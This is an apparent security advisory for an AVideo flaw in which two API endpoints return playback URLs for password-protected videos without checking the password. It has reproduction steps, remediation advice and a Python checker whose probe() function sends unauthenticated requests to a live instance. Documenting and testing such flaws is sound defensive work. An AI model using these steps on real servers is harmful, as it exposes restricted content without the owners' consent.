WWBN AVideo Password Protection Bypass Vulnerability in API Endpoints

Vulnerability

A vulnerability exists in WWBN AVideo up to and including version 26.0: the `get_api_video_file` and `get_api_video` API endpoints return playback data for password-protected videos without verifying the password. An unauthenticated caller can obtain the direct playback URLs, including the MP4 and HLS sources, without ever supplying the correct password. The root cause is that these API endpoints do not invoke the password check that the web playback flow enforces, so the protection exists only on the web path and any password-protected video can be fetched through the API, defeating the password feature entirely.

Impact

Exploitation allows any unauthenticated user to retrieve direct playback URLs for password-protected videos, bypassing the password requirement entirely. Beyond unauthorized access to the videos themselves, the API also reveals which videos are password-protected, which lets an attacker enumerate exactly the content that was meant to be restricted. All password-protected content reachable through the API is affected, including content served to the mobile apps and to third-party integrations that consume the same API.

Reproduction

To reproduce this vulnerability, first identify a password-protected video using the video list API. Then call the `get_api_video_file` or `get_api_video` endpoint for that video without supplying any password. The response includes the direct playback URLs (MP4 and HLS), which can be used to stream or download the video, bypassing the password requirement. The same two calls are a useful post-upgrade check: after patching, the endpoint should no longer return playback URLs for a protected video when no valid password is supplied.
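The check described above, written as a small offline script. This is an added example and not code from the AVideo project or from the advisory. The endpoint path (`/plugin/API/get.json.php`), the `APIName` and `videos_id` query parameters, and the JSON field names (`response`, `videos_id`, `password`) are assumptions made for illustration and must be confirmed against the target instance's API plugin; the sample responses are constructed, not captured from a real server. The logic is generic: it finds videos the list API flags as protected, then scans the unauthenticated `get_api_video_file` response for any MP4 or HLS URL, which is exactly what a patched instance must no longer return.

```python
"""Offline check for the AVideo API password-bypass described above.

Added example, not AVideo project code. Endpoint path, query parameters and
JSON field names are ASSUMPTIONS for illustration; verify them against the
target's API plugin. Sample responses below are constructed, not captured.
"""
import json
import re
from urllib.parse import urlencode
from urllib.request import urlopen

# Assumed endpoint layout (AVideo API plugin style); verify on the target.
API_PATH = "/plugin/API/get.json.php"

# Direct-playback URL patterns the advisory says are leaked: MP4 and HLS.
PLAYBACK_RE = re.compile(r"https?://\S+?\.(?:mp4|m3u8)(?:\?\S*)?$", re.I)


def build_url(base_url, api_name, **params):
    """Build a request URL for an assumed APIName-style endpoint.

    The APIName value is shown as the bare function name; a real dispatcher
    may expect a different form, so treat this as an assumption."""
    query = urlencode({"APIName": api_name, **params})
    return f"{base_url.rstrip('/')}{API_PATH}?{query}"


def protected_video_ids(list_response):
    """IDs of videos the list API marks as password-protected.

    Assumes each entry carries 'videos_id' and a truthy 'password' flag
    (field names are assumptions)."""
    return [v["videos_id"] for v in list_response.get("response", [])
            if v.get("password")]


def leaked_playback_urls(obj):
    """Recursively collect MP4/HLS URLs anywhere in a JSON response, so the
    check does not depend on the exact key the server uses."""
    found = []
    if isinstance(obj, dict):
        for value in obj.values():
            found.extend(leaked_playback_urls(value))
    elif isinstance(obj, list):
        for item in obj:
            found.extend(leaked_playback_urls(item))
    elif isinstance(obj, str) and PLAYBACK_RE.match(obj):
        found.append(obj)
    return found


def assess(list_response, file_responses):
    """Map videos_id -> leaked URLs for every protected video whose
    unauthenticated get_api_video_file response still carries playback URLs.
    An empty dict means the bypass is not reproducible on these responses."""
    findings = {}
    for vid in protected_video_ids(list_response):
        urls = leaked_playback_urls(file_responses.get(vid, {}))
        if urls:
            findings[vid] = urls
    return findings


def probe(base_url, videos_id, timeout=10):
    """Live variant: fetch get_api_video_file for one video with no password
    and no session. Only call this against an instance you are authorized to
    test. Returns the parsed JSON for use with assess()."""
    url = build_url(base_url, "get_api_video_file", videos_id=videos_id)
    with urlopen(url, timeout=timeout) as resp:
        return json.load(resp)


# Constructed sample data: one public video, one password-protected video.
SAMPLE_LIST = {"response": [
    {"videos_id": 101, "title": "Public talk", "password": 0},
    {"videos_id": 202, "title": "Members only", "password": 1},
]}

# Constructed unauthenticated get_api_video_file responses. The protected
# video's response still contains direct HLS and MP4 sources, which is the
# bug; a patched server would return no such URLs for 202 without a password.
SAMPLE_FILES = {
    101: {"response": {"url": "https://example.test/videos/public_talk/index.m3u8"}},
    202: {"response": {
        "url": "https://example.test/videos/members_only/index.m3u8",
        "mp4": "https://example.test/videos/members_only/index.mp4",
    }},
}

if __name__ == "__main__":
    for vid, urls in assess(SAMPLE_LIST, SAMPLE_FILES).items():
        print(f"protected video {vid} leaks playback URLs without a password:")
        for u in urls:
            print("   ", u)
```

On a real instance, replace the constructed samples with the list API response and the per-video output of `probe()`; an empty result from `assess()` after upgrading is the confirmation that the patch took effect.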

Remediation

Users are advised to update to the patched release of AVideo, which adds to the `get_api_video_file` and `get_api_video` endpoints the same password verification the web playback flow already enforces. After upgrading, confirm the fix by requesting a known password-protected video through either endpoint without a password and verifying that no MP4 or HLS URL is returned. Until the update is applied, treat every password-protected video on the instance as publicly reachable.

Added: Mar 27, 2026, 7:26 PM
Updated: Mar 27, 2026, 7:26 PM

Vulnerability Rating

Custom Algorithm

spread: 1.0
impact: 2.5
exploitability: 9.3
remediation: 0.0
relevance: 4.8
threat: 4.8
urgency: 2.9
incentive: 8.3

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.